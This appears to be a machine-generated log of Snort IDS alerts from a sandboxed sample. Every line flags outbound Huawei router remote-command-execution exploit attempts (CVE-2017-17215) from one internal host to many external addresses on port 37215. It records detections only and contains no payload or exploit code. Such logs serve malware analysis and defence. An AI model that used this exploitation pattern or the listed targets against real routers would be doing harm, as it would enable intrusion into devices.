              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48658 -> 41.164.227.208:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48658 -> 41.164.227.208:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37366 -> 156.33.225.228:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37366 -> 156.33.225.228:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38612 -> 41.193.154.175:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38612 -> 41.193.154.175:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45328 -> 156.193.10.45:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45328 -> 156.193.10.45:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36386 -> 41.249.106.11:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36386 -> 41.249.106.11:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40714 -> 197.215.123.203:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40714 -> 197.215.123.203:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56050 -> 156.198.133.179:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56050 -> 156.198.133.179:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52998 -> 156.85.186.89:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52998 -> 156.85.186.89:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45586 -> 41.144.64.245:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45586 -> 41.144.64.245:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38836 -> 156.141.233.124:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38836 -> 156.141.233.124:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43196 -> 41.64.231.154:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43196 -> 41.64.231.154:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55452 -> 41.61.54.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55452 -> 41.61.54.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40380 -> 41.29.240.127:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40380 -> 41.29.240.127:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57566 -> 41.179.71.43:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57566 -> 41.179.71.43:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35770 -> 197.81.225.105:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35770 -> 197.81.225.105:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53694 -> 41.23.36.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53694 -> 41.23.36.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33272 -> 41.104.188.254:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33272 -> 41.104.188.254:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35612 -> 41.125.186.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35612 -> 41.125.186.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51176 -> 41.144.59.161:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51176 -> 41.144.59.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51288 -> 156.122.101.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51288 -> 156.122.101.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53482 -> 41.13.150.2:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53482 -> 41.13.150.2:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54532 -> 197.159.210.112:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54532 -> 197.159.210.112:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36204 -> 41.37.220.142:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36204 -> 41.37.220.142:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49194 -> 156.227.20.171:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49194 -> 156.227.20.171:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41014 -> 156.167.5.201:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41014 -> 156.167.5.201:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48832 -> 156.198.87.202:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48832 -> 156.198.87.202:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52362 -> 156.45.224.43:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52362 -> 156.45.224.43:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41586 -> 197.22.210.222:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41586 -> 197.22.210.222:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59700 -> 41.139.183.232:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59700 -> 41.139.183.232:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53196 -> 156.58.214.28:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53196 -> 156.58.214.28:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49906 -> 156.113.109.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49906 -> 156.113.109.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45594 -> 156.9.236.107:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45594 -> 156.9.236.107:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49600 -> 197.171.180.102:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49600 -> 197.171.180.102:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41724 -> 41.87.170.8:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41724 -> 41.87.170.8:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35458 -> 41.53.249.76:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35458 -> 41.53.249.76:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47716 -> 197.148.143.218:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47716 -> 197.148.143.218:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57592 -> 156.94.219.6:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57592 -> 156.94.219.6:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55648 -> 197.218.44.219:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55648 -> 197.218.44.219:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53806 -> 197.239.209.224:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53806 -> 197.239.209.224:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45532 -> 41.232.72.207:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45532 -> 41.232.72.207:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39892 -> 197.176.79.105:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39892 -> 197.176.79.105:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44394 -> 41.24.85.120:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44394 -> 41.24.85.120:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60494 -> 156.68.148.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60494 -> 156.68.148.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55216 -> 156.37.13.98:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55216 -> 156.37.13.98:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54402 -> 41.152.169.18:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54402 -> 41.152.169.18:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55144 -> 41.61.6.231:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55144 -> 41.61.6.231:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51976 -> 41.137.161.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51976 -> 41.137.161.29:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41296 -> 197.189.238.220:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41296 -> 197.189.238.220:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58966 -> 156.212.207.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58966 -> 156.212.207.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56290 -> 197.25.244.85:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56290 -> 197.25.244.85:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52420 -> 41.169.149.73:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52420 -> 41.169.149.73:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58048 -> 197.126.155.107:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58048 -> 197.126.155.107:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39642 -> 41.89.44.248:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39642 -> 41.89.44.248:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45918 -> 197.35.183.52:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45918 -> 197.35.183.52:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34684 -> 197.65.247.219:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34684 -> 197.65.247.219:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43954 -> 156.91.55.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43954 -> 156.91.55.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58096 -> 156.112.166.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58096 -> 156.112.166.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46024 -> 156.8.32.149:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46024 -> 156.8.32.149:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55562 -> 156.207.94.97:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55562 -> 156.207.94.97:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37980 -> 197.18.253.163:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37980 -> 197.18.253.163:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59608 -> 156.3.243.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59608 -> 156.3.243.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52106 -> 156.93.240.94:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52106 -> 156.93.240.94:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50112 -> 41.14.133.63:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50112 -> 41.14.133.63:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42030 -> 197.154.217.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42030 -> 197.154.217.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45198 -> 156.145.248.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45198 -> 156.145.248.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36686 -> 197.78.230.78:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36686 -> 197.78.230.78:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33038 -> 41.208.140.239:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33038 -> 41.208.140.239:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50018 -> 197.215.229.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50018 -> 197.215.229.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49882 -> 197.121.136.81:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49882 -> 197.121.136.81:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44086 -> 41.139.184.97:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44086 -> 41.139.184.97:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49224 -> 41.43.208.255:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49224 -> 41.43.208.255:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59806 -> 197.33.181.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59806 -> 197.33.181.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38486 -> 41.84.23.118:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38486 -> 41.84.23.118:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60452 -> 156.6.171.128:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60452 -> 156.6.171.128:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34226 -> 41.74.251.91:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34226 -> 41.74.251.91:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33544 -> 41.244.158.164:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33544 -> 41.244.158.164:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47530 -> 156.234.39.13:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47530 -> 156.234.39.13:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60378 -> 156.88.210.161:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60378 -> 156.88.210.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49572 -> 197.229.155.141:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49572 -> 197.229.155.141:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54026 -> 197.236.203.121:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54026 -> 197.236.203.121:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38622 -> 197.213.9.188:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38622 -> 197.213.9.188:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45572 -> 41.109.78.181:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45572 -> 41.109.78.181:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36170 -> 156.47.174.21:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36170 -> 156.47.174.21:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38566 -> 41.5.46.180:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38566 -> 41.5.46.180:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47606 -> 197.110.203.35:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47606 -> 197.110.203.35:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60608 -> 41.55.10.217:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60608 -> 41.55.10.217:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46710 -> 197.109.223.59:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46710 -> 197.109.223.59:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56050 -> 156.13.177.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56050 -> 156.13.177.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40604 -> 197.85.240.37:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40604 -> 197.85.240.37:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39874 -> 41.147.35.71:37215
